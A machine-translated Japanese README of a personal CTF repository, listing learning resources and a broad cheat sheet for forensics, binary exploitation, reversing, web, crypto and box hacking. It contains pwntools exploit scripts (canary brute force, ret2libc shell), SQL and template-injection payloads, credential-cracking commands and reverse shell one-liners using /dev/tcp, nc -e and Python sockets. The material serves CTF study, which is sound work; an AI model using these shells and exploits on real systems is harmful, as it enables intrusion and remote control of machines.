CTFs

私が行ったいくつかの Cyber​​ CTF の書き込み/ファイル

CTF リソースのリストと、多くの一般的な CTF 課題をカバーする包括的なチートシートも含めました。

• リソース

  • YouTube (ビデオリソースが大好きです)
  • 実践・学習サイト
    • CTF
    • 一般的な
    • Pwn
    • 改訂版
    • ウェブ
    • 暗号
    • スマートコントラクト
    • 雲
    • 侵入テスト

• CTF チートシート

  • 法医学 / ステガノグラフィー
    • 一般的な
    • オーディオ
    • 画像
    • ビデオ
    • マシンイメージ
    • Pキャップ
  • Pwn / バイナリエクスプロイト
    • 一般的な
    • バッファオーバーフロー
    • PIE (位置独立実行)
    • NX (実行不可)
    • ROP (静的にコンパイルされたバイナリ用)
    • スタックカナリア
    • フォーマット文字列の脆弱性
    • シェルコード
    • Libc に戻る
  • リバースエンジニアリング
    • SMT ソルバー
    • バイトごとのチェックを反転する
    • gefで文字列を検索する
  • ウェブ
    • 入力フィールドのファジング
  • 暗号

    • サイバーシェフ

    • 一般的な暗号

    • RSA

      • pycryptodome で RSA 情報を取得する
      • 中国の剰余定理 (p,q,e,c)
      • カッパースミスの攻撃 (c,e)
      • ポラードの攻撃 (n、e、c)
      • ウィーナーアタック (n,e,c)

    • Base16、32、36、58、64、85、91、92

  • 箱
    • 接続中
    • 列挙
    • 権限昇格
    • リバースシェルをリッスンする
    • リバースシェル
    • インタラクティブシェルを取得する
      • Linux
      • Windows / 一般
  • OSINT
  • その他

• ジョン・ハモンド
  • 以前は CTF ビデオをたくさん作成していましたが、他のことに移りました
  • まだまだ役に立つ動画がたくさんあります。特に CTF は、サイバーをまったく知らない人に教えるのに最適です。
• ライブオーバーフロー
  • サイバーに関する非常に興味深く詳細なビデオを作成します。
  • 素晴らしいpwnシリーズがあります
• IppSec
  • すべての HackTheBox マシンの記録を作成します
    • diff を解決する方法と、なぜうまくいくのかについて話します。強くお勧めします
• コンピュータマニア
  • Numberphile と同じメンバーですが、よりクールです。基本的な概念についての本当に初心者レベルの直感的なビデオを作成します。
• pwn.college
  • pwn に大量のビデオを持っている ASU 教授
  • ガイド付きコース教材: https://pwn.college/
  • 大量の練習問題: https://dojo.pwn.college/
• PwnFunction
  • diffトピックに関する非常に高品質でわかりやすいアニメーションビデオ
  • トピックは少し高度ですが、簡単に理解できます
• マーティン・カーライル
  • picoCTF の課題に関する素晴らしいまとめビデオを作成します。
• サム・ボーン
  • すべての講義とコース資料をウェブサイトでオープンソース化している CCSF 教授
• UFSIT
  • UF Cyber​​ チーム (私は少し偏見がありますが、これに関しては間違いなく優れた YouTube チャンネルの 1 つです)
• ジンベール
  • 驚くほど直感的なビデオの作成が可能です。 picoCTF 2019 をすべてやり遂げた (それはかなりの量です)
• ブラックヒルズの情報セキュリティ
  • 豊富な教育コンテンツを制作するセキュリティ会社
  • セキュリティに関するトピックに関する無料のコースや Web キャストを常に実施しています
• スタックスマッシュ
  • 素晴らしいリバース エンジニアリングとハードウェア ハッキングのビデオ
  • 彼のリバースエンジニアリングWannaCryの本当にクールなシリーズがある
• ベン・グリーンバーグ
  • GMU 教授と pwn およびマルウェアのビデオ チュートリアルが多数あります
  • 少し時代遅れですが、それでも良いです
• ジョージア工科大学の InfoSecLab
  • pwnに関する優れた高度な詳細な講義
  • ある程度の背景知識が必要です
• RPISEC
  • RPI大学チームミーティング
  • 非常に高度であり、CS の背景知識が多少あることを前提としています
• マットブラウン
  • 組み込みセキュリティ ペンテスター
  • IoT ハッキングに関する優れた初心者向けビデオを作成します

私がまとめたスライドをいくつか示します: hackback.zip/presentations

• ピコCTF
  • 素晴らしい練習課題がたくさんあります。
  • 間違いなく、始めるためのゴールドスタンダードです
• UCF
  • 全体的には良いですが、pwn の練習には最適です
  • 現在、ここに記事を掲載する作業を行っています
• ハッカー101
  • CTF ですが、侵入テストに少し特化しています
• CSAW
  • 90% の確率でダウンし、通常はどの接続も機能しません
  • ただし、起動している場合は、優れた入門課題がたくさんあります
• CTF101
  • 私がこれまでに見た CTF の最高の入門書の 1 つ (gj osiris)
  • 非常に簡潔で初心者に優しい

• ハックザボックス
  • OGボックスサイト
    • 品質を保証するために箱は厳選されています
  • CTF スタイルの問題がいくつかあります
  • 学習を始められるコースが登場
• TryHackMe
  • HackTheBoxよりも少し簡単なボックス
  • 段階的な課題
  • トピックをガイドする「ラーニング パス」が追加されました
• サイバーセックラボ
  • 素晴らしいボックスのコレクション
  • CTF要素がいくつかあります
• バルンハブ
  • 脆弱な仮想マシンがあるため、自分で導入する必要がある
  • 種類は豊富だけど、良いものを見つけるのは難しい

• pwnable.kr
  • さまざまな難易度のチャレンジ
• pwnable.tw
  • pwnable.krよりも難しい
  • 課題を解決したら書き込みあり
• pwnable.xyz
  • さらなるpwnチャレンジ
  • 課題を解決したら書き込みあり
  • すべての課題を解決したら、自分の課題をアップロードできます
• pwn道場
  • 私の意見では、pwn チャレンジの最高のコレクション
  • やり方を説明するスライドが付属しており、サポートが必要な場合はDiscordを利用できます
• 悪夢
  • C バイナリを pwn するためのゴールド スタンダード
  • いくつかの間違い/タイプミスがありますが、全体的には素晴らしいです
• pwnノート
  • オンライン上のランダムな人からのメモ
  • 非常に表面的な内容ですが、すべてを理解するのに最適です
• セキュリティサマースクール
  • ブカレスト大学セキュリティコース
  • とても初心者に優しい解説
• RPISEC MBE
  • RPI の最新バイナリ悪用コース
  • 実践用の大量のラボ/プロジェクトと、いくつかの（少し古い）講義があります
• どのように2ヒープ
  • ASU の CTF チームが作成した Heap Exploitation シリーズ
  • エクスプロイトがどのように機能するかを示す非常にクールなデバッガー機能が含まれています
• ROPEポリアム
  • リターン指向プログラミングを教えるすべての主要なアーキテクチャにおける一連の課題
  • 非常に高品質です。最も基本的な技術から最先端の技術までを指導します。
  • 現在、ここに私自身の記事を追加しています
• フェニックスエクスプロイト教育
  • 難易度順に並べられた大量のバイナリ悪用問題
  • ソースが含まれており、すべてのバイナリを含む VM が付属しています。

• チャレンジ.re
  • 課題が多すぎます 0_0
  • たくさんの多様性
• 反転.kr
• クラックメスワン
  • 大量のクラックミー (CTF) スタイルの課題
• マルウェア ユニコーン ワークショップ
  • リバース エンジニアリングとマルウェア分析に関する無料のワークショップ

• websec.fr
  • さまざまな難易度のウェブチャレンジがたくさんあります
• ウェブハッキング.kr
  • 多くの優れた Web チャレンジのアーカイブがある
• Web アプリケーションの保護
  • オープンソース CCSF コース
• オワスプジュースショップ
  • ペネトレーションテストに非常に特化していますが、CTF で Web を探索するのに役立ちます
  • 合計 100 を超える脆弱性/チャレンジ
• ポートスウィガー
  • Web ハッキングを理解するためのゴールドスタンダード
  • たくさんの素晴らしいチャレンジと解説
• DVWA
  • ペネトレーションテストに非常に特化していますが、CTF で Web を探索するのに役立ちます
• bWAPP
  • ペネトレーションテストに非常に特化していますが、CTF で Web を探索するのに役立ちます
• CTFチャレンジ
  • Adam Langley が作成した、可能な限り現実的になるように作られた Web チャレンジのコレクション。
  • バグ報奨金の経験値を得るのに最適

• クリプトハック
  • 現在、ここに記事を掲載する作業を行っています
• クリプトパル
  • OG クリプト チャレンジ サイト。
• クリプトCTF
  • 年次暗号CTF。過去のものは20{19,20,21,22,23,24}.cr.yp.toc.tfからアクセスできます。

• エーテルを捕獲する

• クラウドフォクサブル
  • Cloudfox を使用して悪用される脆弱な環境をセットアップする手順を説明します。
• 欠陥.クラウド
  • S3、EC2、Lambda の秘密を見つけることを伴う無料のチャレンジ

• ハッカー101
• ハクスプレイン
• エクスプロイト開発
  • オープンソース CCSF コース
• セキュリティの概要
  • ディアン・ステファンが教えるカリフォルニア大学サンディエゴコース
  • 基本的な pwn と crypto をカバーします
• Active Directory チートシート
• WADComs
  • Windows/AD環境用のインタラクティブなチートシート
• ロルバス
  • Windows用の対話型チートシート「Living off the land」悪用用のバイナリ、スクリプト、ライブラリ
• GTFOB
  • Linuxの「土地を離れて生きる」テクニックのための対話型チートシート。

• アペリソルブ
  • 他の stego ツールを自動的に実行するツール
• さまざまな種類の課題に関する John Hammond の非常に優れたリソース:
  • https://github.com/JohnHammond/ctf-katana
• 課題を作成して解決するためのもう 1 つの非常に優れたチートシート:
  • https://github.com/apsdehal/awesome-ctf/blob/master/README.md
• ファイル
  • file <file.xyz>
  • ファイルの種類を決定します
• ステヒデ
  • steghide extract -sf <file.xyz>
  • 埋め込まれたファイルを抽出します
• ステグシーク
  • stegseek <file> <password list>
  • ワードリストを使用して埋め込みファイルを抽出します
  • 超超速い
• ビンウォーク
  • binwalk -M --dd=".*" <file.xyz>
  • 埋め込まれたファイルを抽出します
• exiftool
  • exiftool <file.xyz>
  • メタデータを読み取ります
• 文字列
  • strings <file.xyz>
  • ファイル内のすべての印刷可能な文字を検索します
• ヘキサエディット
  • hexedit <file.xyz>
  • 一部の画像を開くには、ファイル署名の変更が必要な場合があります。
  • 一般的なファイル署名のリスト
• Ghex (別の 16 進エディタですが、GUI を備えています。特定のバイトにジャンプする必要がある場合に適しています)
  • ghex <file.xyz>
• docx ファイルはコンテナなので、解凍して隠されたコンテンツを見つけることができます
  • unzip <file.docx>
• Grep - grep を使用してフラグを再帰的に検索する良い方法:
  • grep -r --text 'picoCTF{.*}'
  • egrep -r --text 'picoCTF{.*?}
  • 「picoCTF」を探しているフラグの先頭に変更できます
• Ltrace - プログラムの実行時にコードが何を行っているかを確認できます。
  • ltrace ./<file>
  • ltrace -s 100 ./<file>
    • Ltrace は非常に長い文字列を短縮します。 -s を使用すると、ltrace で表示される文字数を増やすことができます。大きな文字列を含む strcmp を確認する場合に適しています。

• ファックス機の音声:

  • 例
  • デコーダ

• SSTV (スロースキャン TV) オーディオ (月のもの)

  • 例
  • デコーダ
  • 代替デコーダ
  • 次の qsstv 設定を使用します。

  

• スペクトログラム画像

  • デコーダ

• ピッチ、スピード、方向を変える...

  • ピッチ、スピード、チューニング
  • 逆行する

• DTMF (デュアル トーン多重周波数) 電話キー

  • multimon-ng -a DTMF -t wav <file.wav>
    • これらは文字をマルチタップできることに注意してください。
      • これにより、数値をテキストにデコードできます

• カセットテープ

  • 例
  • デコーダ（wavからファイルをタップ）

• モールス信号

  • デコーダ

• ステグソルブ

  • ビットを切り替える

• 一番最初に

  • 画像を抽出するための特別なツール
  • 壊れた画像をまとめるために使用できます (pcap など)。

• デピックス

  • テキストのピクセル化を解除する

• 何かがフォトショップで加工されていないか確認します (ハイライトを見てください)

  • https://29a.ch/photo-forensics/#error-level-anasis

• ズステグ

  • LSBデコーダ

• ジェステグ

  • jpeg ステガノグラフィー ソルバー

• ピクスリカバリー

  • これまでのところ、私が見つけた最も効果的なpng回復ツールです（透かしを気にしない限り）
  • photopeaも非常にうまく機能します

• crc32fix

  • チェックサムに基づいて PNG の高さと幅を修正します

• PCRT

  • PNGのヘッダーとフッター情報を修正

• png-crc-fix

  • PNGチェックサムを修正

• pngチェック

  • pngにエラーがあるかどうかを確認する
  • pngチェック

• ファイルの回復
  • photorec <file.bin>
• イメージを仮想マシンとしてマウントできます
  • https://habr.com/ja/post/444940/
• .imgファイルをマウントします。
  • binwalk -M --dd=".*" <fileName>
  • 出力でfile実行し、Linux ファイルシステム ファイルを選択します
  • losetup /dev/loop<freeLoopNumber> <fileSystemFile>

• tcpflowでデータを抽出する
  • tcpflow -r <file.pcap>
• Wireshark でデータを抽出する
  • ファイル → オブジェクトのエクスポート → 選択を行う

• このチートシートは私が pwn についてよく知る前に作成されたものであるため、代わりに私の LearnPwn リポジトリを参照することをお勧めします。
  • ただし、ここにあるものを修正するいくつかのメモを含めました。

• ELF のセキュリティをチェックする
  • checksec <binary>
  • rabin2 -I <binary>
• PEのセキュリティをチェックする
  • バイナリセキュリティチェック
  • binary-security-check <bin>.exe
• seccomp bpf をチェックする
  • seccomp-ツール
  • seccomp-tools dump ./<binary>
• シンボルを見てください
  • readelf -s <binary>
• 文字列を見てください
  • rabin2 -z <binary>
• アドレスをバイトにパックする
  • リトルエンディアン（32ビット用）
    • python -c "import pwn; print(pwn.p32(<intAddr>))
  • ビッグエンディアン（64ビット用）
    • python -c "import pwn; print(pwn.p64(<intAddr>))
  • pwntools はアドレスを正しいエンディアンで自動的にパックします。

• /bin/sh シェルを取得する必要があり、それが確実に動作するにもかかわらずプログラムが終了してしまう場合は、次のトリックを使用してください。
  • ( python -c "print '<PAYLOAD>'" ; cat ) | ./<program>
  • pwntools はprocess.interactive()を使用してこれを行います。

• ランダムな値を決定する
  • pwn cyclic <numChars>によるペイロードの生成
  • dmesg | tail | grep segfaultエラーが発生した場所を確認します
  • pwn cyclic -l 0x<errorLocation> 、制御命令ポインターへのランダムなオフセットを確認します。
  • 例

• ROP (リターン指向プログラミング) を使用して解決できます。

• ROPガジェット
  • ガジェットを表示し、ロップチェーンを自動的に生成します
  • ROPgadget --ropchain --binary <binary>
    • 次に、コードの先頭にパディングを追加し（バッファーと戻りアドレスの差に基づいて）、コードを実行してシェルを取得します。
    • デモ
• ロップ

デバッガーでのスタック カナリアの検索

• スタック カナリアは、バッファ オーバーフローによって上書きされる可能性がある EIP/RIP (命令ポインタ) の前に配置される値です。スタックが元のものとは異なるものに上書きされると、プログラムは基本的にエラーを引き起こします。私たちの目標は、オーバーフローしたときにプログラムが正常に実行できるように、元のスタックを見つけることです。
• スタック カナリアはgsまたはfs (それぞれ 32 ビットと 64 ビット) から取得されます。
  • 逆アセンブリでは、何かが読み取られる前に、次のような行が表示されます。

   0x000000000000121a <+4>: sub    rsp,0x30
   0x000000000000121e <+8>: mov    rax,QWORD PTR fs:0x28
   0x0000000000001227 <+17>:mov    QWORD PTR [rbp-0x8],rax
   0x000000000000122b <+21>:xor    eax,eax

• ここで、スタック カナリアはオフセット +8 のraxに移動されます。
  • したがって、次のオフセットでブレークし、rax ( ir rax ) の内容をチェックして、現在のカナリアが何であるかを確認します。

静的カナリア

• カナリアは、プログラマーによって手動で実装された場合 (一部の intro pwn チャレンジの場合に当てはまります)、またはプログラムをフォークできる場合にのみ静的です。
  • バイナリをフォークすると、フォークされたものには同じカナリアが含まれるため、そのバイナリに対してバイトごとのブルートフォースを実行できます。

余分な

• スタック カナリアが不適切に上書きされると、 __stack_chk_failが呼び出されます。

  • カナリアをリークできない場合は、GOT テーブルが呼び出されないよう変更することもできます。

• カナリアは現在のスタックのTLS構造に保存され、 security_initによって初期化されます。

  • 実際のカナリア値を上書きできる場合は、オーバーフローすることを決定したものと同じ値を設定できます。

• 静的 4 バイト カナリアをブルートフォースする簡単なスクリプト:

 #!/bin/python3
from pwn import *

#This program is the buffer_overflow_3 in picoCTF 2018
elf = ELF ( './vuln' )

# Note that it's probably better to use the chr() function too to get special characters and other symbols and letters.
# But this canary was pretty simple :)
alphabet = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890"

canary = ''
# Here we are bruteforcing a canary 4 bytes long
for i in range ( 1 , 5 ):
    for letter in range ( 0 , len ( alphabet )):  # We will go through each letter/number in the string 'alphabet'
        p = elf . process ()  # We start the process
        wait = p . recv (). decode ( 'utf-8' )
        p . sendline ( str ( 32 + i ))  # In this program, we had to specify how many bytes we were gonna send.
        wait = p . recv (). decode ( 'utf-8' )
        p . sendline ( 'A' * 32 + canary + alphabet [ letter ])  # We send the 32 A's to overflow, and then the canary we already have + our guess
        prompt = p . recv (). decode ( 'utf-8' )
        if "Stack" not in prompt :  # The program prints "Stack smashed [...]" if we get wrongfully write the canary.
            canary += alphabet [ letter ]  # If it doesn't print that, we got part of our canary :)
            break  # Move on to the next canary letter/number

print ( "The canary is: " + canary )

• 「printf(buf)」またはそのようなものが表示された場合に何を試すべきかについては、表 2 を参照してください。
  • https://owasp.org/www-community/攻撃/Format_string_攻撃
• picoCTF 2018 で「echooo」チャレンジを行う John Hammond を見ることを強くお勧めします
• 場合によっては、「%s %s %s %s %s %s」のようにスタックから文字列のみを出力しようとすると、スタック内のすべてが文字列であるわけではないため、エラーが発生することがあります。
• 代わりに「%x %x %x %x %x %s」を実行して、これを最小限に抑えてください。
• 入力する %x と %s の数を常に増やす必要があるのではなく、パラメータを渡して簡単にすることができます。
  • %1$s - これはスタック内の最初の値 (私が理解しているところによると、バッファーのすぐ隣の値) を文字列として出力します。
  • %2$s - これにより、2 番目の値が文字列として出力されます。
  • ワンライナー ループを使用して、スタックをリークすることでフラグの検索を試みることができます。 ^C (CTRL + C) を押して次の値に移動します。
    • for i in {1..100}; do echo "%$i$s" | nc [b7dca240cf1fbf61.247ctf.com](http://b7dca240cf1fbf61.247ctf.com/) 50478; done
• さまざまなサイズパラメータを使用して、漏れの量を制御できます。
  • %hhx 1 バイト (int サイズの半分の半分) をリークします。
  • %hx 2 バイト (int サイズの半分) をリークします
  • %x 4 バイト (int サイズ) をリークします
  • %lx 8 バイト (長いサイズ) をリークします
• fstring vuln と %n を使用したスタックの変更に関する非常に良いビデオ:
  • https://www.youtube.com/watch?v=gzLPVkZbaPA&ab_channel=マーティンカーライル

• さまざまなシェルコードを見つけるのに適した Web サイト:
  • http://shell-storm.org/shellcode/

• EIP を上書きして system() ライブラリ関数を呼び出し、それが実行するもの (この例では「/bin/sh」を持つバッファ) も渡します。

• 良い説明:

  • https://www.youtube.com/watch?v=FvQYGAM1X9U&ab_channel=NPTEL-NOCIITM

• 良い例 (3:22:44 に移動):

  • https://www.youtube.com/watch?v=uIkxsBgkpj8&t=13257s&ab_channel=freeCodeCamp.org
  • https://www.youtube.com/watch?v=NCLUm8geskU&ab_channel=ベングリーンバーグ

• execve("/bin/sh") のアドレスを取得します

  • one_gadget <libc file>

• libc ファイルと場所をすでに知っている場合 (つまり、それらを漏らす必要はありません...)

 #!/bin/python3

from pwn import *
import os

binaryName = 'ret2libc1'

# get the address of libc file with ldd
libc_loc = os . popen ( f'ldd { binaryName } ' ). read (). split ( ' n ' )[ 1 ]. strip (). split ()[ 2 ]

# use one_gadget to see where execve is in that libc file
one_gadget_libc_execve_out = [ int ( i . split ()[ 0 ], 16 ) for i in os . popen ( f'one_gadget { libc_loc } ' ). read (). split ( " n " ) if "execve" in i ]

# pick one of the suitable addresses
libc_execve_address = one_gadget_libc_execve_out [ 1 ]

p = process ( f'./ { binaryName } ' )
e = ELF ( f'./ { binaryName } ' )
l = ELF ( libc_loc )

# get the address of printf from the binary output
printf_loc = int ( p . recvuntil ( ' n ' ). rstrip (), 16 )

# get the address of printf from libc
printf_libc = l . sym [ 'printf' ]

# calculate the base address of libc
libc_base_address = printf_loc - printf_libc

# generate payload

# 0x17 is from gdb analysis of offset from input to return address
offset = 0x17

payload = b"A" * offset
payload += p64 ( libc_base_address + libc_execve_address )

# send the payload
p . sendline ( payload )

# enter in interactive so we can use the shell created from our execve payload
p . interactive ()

クールなガイド: https://opensource.com/article/20/4/linux-binary-analysis

• ギドラ
  • 非常に便利な逆コンパイラ
• dotPeek または dnSpy
  • .NET 実行可能ファイルを逆コンパイルする
• jadx と jadx-gui
  • APKを逆コンパイルする
• 開発ツールゾーン
  • Javaをオンラインで逆コンパイルする
• キルトフラワー
  • 高度なターミナルベースの Java デコンパイラ
• apktool
  • APKを逆コンパイルする
  • apktool d *.apk
• gdb
  • バイナリ解析
  • peda (機能を強化するための拡張機能)
  • gef (pwners 用の gdb 拡張子)
• レーダー2
  • バイナリ解析
• フロス
  • ステロイドのstrings 。静的分析を使用して文字列を検索および計算します

• アンガー (Python)
  • ドキュメント
  • チュートリアル
• z3
  • チュートリアル

https://dustri.org/b/defeating-the-recons-movfuscator-crackme.html

• これは、時間ベースの攻撃を使用するチャレンジ用に私が作成したバージョンです。
  • ランダム性を考慮して数回実行する必要がある場合があります

 #!/bin/python3

from pwn import *
import string

keyLen = 8
binaryName = 'binary'

context . log_level = 'error'

s = ''
print ( "*" * keyLen )
for chars in range ( keyLen ):
    a = []
    for i in string . printable :
        p = process ( f'perf stat -x, -e cpu-clock ./ { binaryName } ' . split ())
        p . readline ()
        currPass = s + i + '0' * ( keyLen - chars - 1 )
        # print(currPass)
        p . sendline ( currPass . encode ())
        p . readline ()
        p . readline ()
        p . readline ()
        info = p . readall (). split ( b',' )[ 0 ]
        p . close ()
        try :
            a . append (( float ( info ), i ))
        except :
            pass
        # print(float(info), i)
    a . sort ( key = lambda x : x [ 0 ])
    s += str ( a [ - 1 ][ 1 ])
    print ( s + "*" * ( keyLen - len ( s )))
    # print(sorted(a, key = lambda x: x[0]))

p = process ( f'./ { binaryName } ' )
p . sendline ( s . encode ())
p . interactive ()

• フラグが変数またはレジスタに読み込まれている場合は、移動後にブレークしてgrep <string>を実行すると、gef が検索パターンに一致する文字列を自動的に表示します。

• ニクト (許可されている場合)
  • 自動的に脆弱性を探します
• ゴバスター（許可されている場合）
  • ブルート フォースのディレクトリとファイル
• ヒドラ（許可されている場合）
  • さまざまなサービスへのブルート フォース ログイン
• げっぷスイート
  • Web リクエストをインターセプトし、変更できるようにします
• ワイヤーシャーク
  • ライブネットワークトラフィックとpcapファイルを分析する
• phpリバースシェル
  • ファイルをアップロードできる Web サイトに便利です
  • このファイルが機能するにはサーバー上で実行する必要があります
• WPScan
  • wordpress ウェブサイトをスキャンする
  • 最良の結果を得るには、 wpscan --url <site> --plugins-detection mixed -eと API キーを使用します。
• jwt
  • Base64 でエンコードされた JSON (したがって JWT トークン) は「ey」で始まるため、JWT トークンを識別できます。
  • このサイトは JSON Web トークンをデコードします
  • JSON Web トークンの秘密を解読して、独自のトークンを変更して署名できます。
    • echo <token> > jwt.txt
    • john jwt.txt
• SQLインジェクション
  • sqlmap
    • sqlmap --forms --dump-all -u <url>
    • SQLインジェクションのプロセスを自動化します
  • 基本的なSQLインジェクション
    • ログインフォームに'OR 1=1--と入力します
    • サーバー上では、これはSELECT * FROM Users WHERE User = '' OR 1=1--' AND Pass = ''として評価されます。
    • 1=1 true と評価され、 ORステートメントを満たし、クエリの残りの部分は--によってコメントアウトされます。
• ペイロードすべてのこと
  • 大量のペイロードを含む Web 活用に最適なリソース
• テンプレートのインジェクション
  • tplmap
    • 自動化されたサーバー側テンプレートインジェクション
  • ジンジャインジェクション
    • {{ config.items() }}
  • フラスコ注入
    • {{ 構成 }}
  • Python eval() 関数
    • __import__.('subprocess').getoutput('<command>')
      • うまくいかない場合は括弧を入れ替えてください
    • __import__.('subprocess').getoutput('ls').split('\n')
      • システム内のファイルをリストする
  • さらにPythonインジェクション
• クロスサイトスクリプティング
  • CSP評価者
    • Google のコンテンツ セキュリティ ポリシー評価者

• ふふふ
  • リクエストを入力フィールドにコピーし、パラメーターを「FUZZ」に置き換えます。
    • ffuf -request input.req -request-proto http -w /usr/share/seclists/Fuzzing/special-chars.txt -mc all
    • サイズをフィルターするには-fs使用します

• サイバーシェフ
  • さまざまな暗号化操作を実行します

暗号検出器

• ハシド
  • ハッシュ タイプを検出するコマンドライン ユーティリティ

• シーザーズ暗号
• ヴィジェネール暗号

 #### Solver using custom table
cipherText = ""
plainText = ""
flagCipherText = ""
tableFile = ""

with open ( cipherText ) as fin :
    cipher = fin . readline (). rstrip ()

with open ( plainText ) as fin :
    plain = fin . readline (). rstrip ()

with open ( flagCipherText ) as fin :
    flag = fin . readline (). rstrip ()

with open ( tableFile ) as fin :
    table = [ i . rstrip (). split () for i in fin . readlines ()]

table [ 0 ]. insert ( 0 , "" ) # might have to modify this part.
            # just a 2d array with the lookup table
            # should still work if the table is slightly off, but the key will be wrong
key = ""
for i , c in enumerate ( plain [ 0 : 100 ]):
  col = table [ 0 ]. index ( c )
  for row in range ( len ( table )):
    if table [ row ][ col ] == cipher [ i ]:
      key += table [ row ][ 0 ]
      break

print ( key )

dec_flag = ""
for i , c in enumerate ( flag [: - 1 ]):
  col = table [ 0 ]. index ( key [ i ])
  for row in range ( len ( table )):
    if table [ row ][ col ] == flag [ i ]:
      dec_flag += table [ row ][ 0 ]
      break

print ( dec_flag )

• 置換暗号
• ロット13
• キー付きシーザーズ暗号

 from Crypto . PublicKey import RSA

keyName = "example.pem"

with open ( keyName , 'r' ) as f :
    key = RSA . import_key ( f . read ())

print ( key )

# You can also get individual parts of the RSA key 
# (sometimes not all of these)
print ( key . p )
print ( key . q )
print ( key . n )
print ( key . e )
print ( key . d )
print ( key . u )

# public keys have n and e 

• 数値n因数分解できる場合にこれを使用します

  • 不適切な実装には複数の素因数があります
  • 証拠

• 古い

 def egcd ( a , b ):
    if a == 0 :
        return ( b , 0 , 1 )
    g , y , x = egcd ( b % a , a )
    return ( g , x - ( b // a ) * y , y )

def modinv ( a , m ):
    g , x , y = egcd ( a , m )
    if g != 1 :
        raise Exception ( 'No modular inverse' )
    return x % m

p = 
q = 
e = 
c = 

n = p * q # use factordb command or website to find factors

phi = ( p - 1 ) * ( q - 1 ) # phi is simply the product of (factor_1-1) * ... * (factor_n -1)

d = modinv ( e , phi ) # private key

# print(d)

m = pow ( c , d , n ) # decrypted plaintext message in long integer form

thing = hex ( m )[ 2 :] # ascii without extra stuff at the start (0x)
print ( bytes . fromhex ( thing ). decode ( 'ascii' ))

• 新しい

 #!/bin/python3
from Crypto . Util . number import *
from factordb . factordb import FactorDB

# ints:
n =    
e =  
c =  

f = FactorDB ( n )
f . connect ()
factors = f . get_factor_list ()

phi = 1
for i in factors :
    phi *= ( i - 1 )

d = inverse ( e , phi )
m = pow ( c , d , n )

flag = long_to_bytes ( m ). decode ( 'UTF-8' )
print ( flag )

• 因数とオイラー和(ファイ)を与えるウェブサイト
  • https://www.alpertron.com.ar/ECM.HTM

• 通常、指数が非常に小さい場合 (e <= 5) に使用されます。
  • 証拠

 from Crypto . Util . number import *
def nth_root ( radicand , index ):
    lo = 1
    hi = radicand
    while hi - lo > 1 :
        mid = ( lo + hi ) // 2
        if mid ** index > radicand :
            hi = mid
        else :
            lo = mid

    if lo ** index == radicand :
        return lo
    elif hi ** index == radicand :
        return hi
    else :
        return - 1

c = 
e = 

plaintext = long_to_bytes ( nth_root ( c , e ))
print ( plaintext . decode ( "UTF-8" ))

• ポラードの因数分解法に基づいており、素数の積が (B) 滑らかであれば素因数分解が容易になります。
  • これはp-1 | B!の場合に当てはまります。 p-1 | B! q - 1因数は > Bです

 from Crypto . Util . number import *
from math import gcd

n = 
c = 
e = 

def pollard ( n ):
    a = 2
    b = 2
    while True :
        a = pow ( a , b , n )
        d = gcd ( a - 1 , n )
        if 1 < d < n : 
            return d
        b += 1

p = pollard ( n )
q = n // p

phi = 1
for i in [ p , q ]:
    phi *= ( i - 1 )

d = inverse ( e , phi )
m = pow ( c , d , n )

flag = long_to_bytes ( m ). decode ( 'UTF-8' )
print ( flag )

• d が小さすぎる (または e が大きすぎる) 場合に使用します。
  • このPythonモジュールを使用する
  • 証拠

 from Crypto . Util . number import *
import owiener

n = 
e = 
c = 

d = owiener . attack ( e , n )
m = pow ( c , d , n )

flag = long_to_bytes ( m )
print ( flag )

https://github.com/mufeedvh/basecrack

• ssh
  • ssh <username>@<ip>
  • ssh <username>@<ip> -i <private key file>
  • SSH をファイル システムとしてローカルにマウントします。
    • sshfs -p <port> <user>@<ip>: <mount_directory>
  • 既知のホスト
    • ssh-copy-id -i ~/.ssh/id_rsa.pub <user@host>
• ネットキャット
  • nc <ip> <port>

• マシンの発見

  • netdiscover

• マシンのポートスキャン

  • nmap -sC -sV <ip>

• Linuxの列挙

  • enum4linux <ip>

• SMB の列挙

  • smbmap -H <ip>

• SMB共有に接続する

  • smbclient //<ip>/<share>

• リンピース
  • ./linpeas.sh
  • 権限昇格ベクトルを自動的に検索します
• root として実行できるコマンドをリストします。
  • sudo -l
• SUID 権限を持つファイルを検索する
  • find / -perm -u=s -type f 2>/dev/null
  • これらのファイルは、ユーザーが実行するのではなく、所有者の権限で実行されます。
• すべてのサービスの権限を検索する
  • accesschk.exe -uwcqv *
  • システム アカウントまたは管理者アカウントの下にないサービスを探します
• クエリサービス
  • sc qc <service name>
  • cmd.exe でのみ動作します

• nc -lnvp <port>

• revshells.com
  • 基本的に必要なものすべてのテンプレート
• python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<ip>",<port>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
• nc -e /bin/sh <ip> <port>
• bash -i >& /dev/tcp/<ip>/<port> 0>&1

1. 次の Python コマンドを実行して、部分的に対話型にします: python -c 'import pty;pty.spawn("/bin/bash");'
2. CTRL+Zを押して netcat セッションを終了し、ローカルでstty raw -echoを実行します。
3. コマンドfg (必要に応じてその後ジョブ ID) を使用してセッションを再入力します。
4. export TERM=xterm実行して、ターミナル エミュレータを xterm に変更します (これは必要ない場合があります)。
5. export SHELL=bash実行して、シェルを bash に変更します (これは必要ない場合があります)。
6. 終わり！これで、シェルが完全にインタラクティブになるはずです

1. システムにrlwrapインストールする
2. これで、nc リスナーを実行するたびに、 rlwrap先頭に置くだけです。
3. 例: rlwrap nc -lvnp 1337
   • これにより、矢印キーとコマンド履歴が表示されますが、Windows および *nix システムでは (私の知る限り) オートコンプリートは表示されません。

• ピムアイ
  • インターネット上の逆検索顔
• OSINTフレームワーク
  • 大量の OSINT ツールを集約した Web サイト
• GeoSpy AI
  • 画像だけで位置を推定できる地理空間ビジョンLLM
• オーバーパスターボ
  • OpenStreetMap API をクエリして結果を視覚化できる Web サイト
• Bellingcat OSM 検索
  • OSM API を簡単にクエリできる Web サイト

• DNS エラーの解決

  • dig <site> <recordType>
  • レコードタイプのリスト
    • ぜひTXTを試してみてください

• バイナリを別のアーキテクチャとして実行する

  • 64ビット:
    • linux64 ./<binary>
  • 32ビット:
    • linux32 ./<binary>

• MS マクロを抽出します。

  • https://www.onlinehashcrack.com/tools-online-extract-vba-from-office-word-excel.php

• CNC Gコードを表示する

  • https://ncviewer.com/